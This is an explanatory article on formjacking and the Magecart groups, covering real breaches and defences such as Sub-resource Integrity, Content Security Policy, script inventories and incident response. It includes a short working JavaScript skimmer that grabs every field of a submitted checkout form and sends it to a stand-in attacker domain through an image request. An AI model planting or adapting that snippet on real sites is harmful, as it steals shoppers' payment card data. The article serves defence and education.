Formjacking injects malicious JavaScript into legitimate e-commerce checkout pages to steal payment card data as customers type it. The Magecart group (actually multiple distinct threat actors) has compromised thousands of websites using this technique — including British Airways, Ticketmaster, and Newegg. Customers see a normal checkout experience while their card details are silently sent to attacker servers.
How Formjacking Works
The Basic Attack
- Attacker compromises a website (CMS vulnerability, weak admin credentials, supply chain compromise)
- Injects a small JavaScript snippet into checkout pages
- The script listens to form input events and captures keystrokes
- When the form submits, it exfiltrates captured data to an attacker-controlled server
- The legitimate payment still processes normally — no indication of theft
A minimal formjacker might look like:
// Obfuscated real-world example (simplified)
document.addEventListener('submit', function(e) {
var form = e.target;
var data = {};
// Capture all form fields
[].forEach.call(form.elements, function(field) {
if (field.name && field.value) {
data[field.name] = field.value;
}
});
// Exfiltrate to attacker server
var img = new Image();
img.src = 'https://cdn.legitimate-looking-domain.com/pixel?' +
btoa(JSON.stringify(data));
});
The exfiltration often uses image requests or WebSockets to avoid CORS restrictions and blend in with legitimate tracking pixels.
Supply Chain / Third-Party Scripts
The most insidious variant: attackers compromise a third-party JavaScript library used by many e-commerce sites. One compromise → thousands of sites affected simultaneously.
The British Airways breach (2018, 380,000 card details stolen) was traced to a compromised Modernizr JavaScript library file served from the website’s CDN.
Third-party scripts on a typical e-commerce checkout page:
- Analytics (Google Analytics, Adobe Analytics)
- A/B testing tools
- Customer chat widgets
- Tag managers (Google Tag Manager)
- Social media buttons
Any of these is a potential formjacking vector.
Magecart Groups
“Magecart” refers to multiple distinct threat actor groups (Group 1–14+ documented) using different infrastructure and techniques:
- Group 4: most sophisticated, uses custom obfuscation, steganography to hide code in images
- Group 6: targeted attacks on high-value retailers
- Group 12: automated attacks on Magento e-commerce platforms (hence “Magecart” — Magento shopping cart)
Detection
As a User
- Pay by credit card, not debit: credit cards have better fraud protection
- Use virtual card numbers: Revolut, Privacy.com, bank-issued virtual cards — single-use card numbers that limit exposure
- Apply Pay / Google Pay: tokenization means your real card number never reaches the merchant’s code
- Check statements: review card transactions within 24–48 hours after online purchases
Browser-based detection is limited — the injected script looks like legitimate JavaScript to users.
As a Website Owner
Sub-resource Integrity (SRI): verify third-party scripts haven’t been modified:
<script
src="https://cdn.jsdelivr.net/npm/[email protected]/dist/jquery.min.js"
integrity="sha256-/JqT3SQfawRcv/BIHPThkBvs0OEvtFFmqPF/lYI/Cxo="
crossorigin="anonymous">
</script>
If the script is modified, the hash won’t match and the browser refuses to load it.
Content Security Policy (CSP):
Content-Security-Policy:
script-src 'self' https://cdn.trusted-partner.com;
connect-src 'self';
form-action 'self' https://payment-processor.com;
This prevents injected scripts from loading from unauthorized domains and blocks exfiltration requests to unknown servers.
Real User Monitoring and Script Inventory:
- Use a Web Application Firewall (Cloudflare, Akamai) with bot detection
- Maintain an inventory of all JavaScript loaded on checkout pages
- Alert on any new script or changed script hash in CSP violation reports
Automated Scanning Tools
- Snyk and Socket.dev: detect compromised npm packages
- Reflectiz and PerimeterX Code Defender: commercial formjacking detection
- Website Malware Scanner (Sucuri): free scanning for known malicious scripts
Incident Response for Affected Merchants
If formjacking is discovered:
- Immediate: remove the malicious script, change all admin credentials
- Scope: determine when injection occurred and how many transactions were affected
- Notify: PCI DSS requires notifying acquiring bank and card networks within 24–72 hours
- Forensics: preserve server logs, identify infection vector (how did attacker get in?)
- PCI Compliance: may require a forensic investigation by a PCI-qualified forensic investigator (QFI)
- Customer notification: GDPR/CCPA breach notification obligations typically trigger
For Individual Users: Best Practices
- Use virtual cards for online purchases — Privacy.com (US) creates single-use numbers
- Apple Pay/Google Pay where available — your real card number never transmitted
- Monitor transactions actively — enable SMS or push notifications for all card transactions
- Use credit, not debit — credit cards limit fraud liability; debit cards risk bank account access
Formjacking remains a high-volume threat because it’s difficult for users to detect, profitable at scale, and exploits the fragmented trust model of web JavaScript where a site’s security depends on every third-party it includes.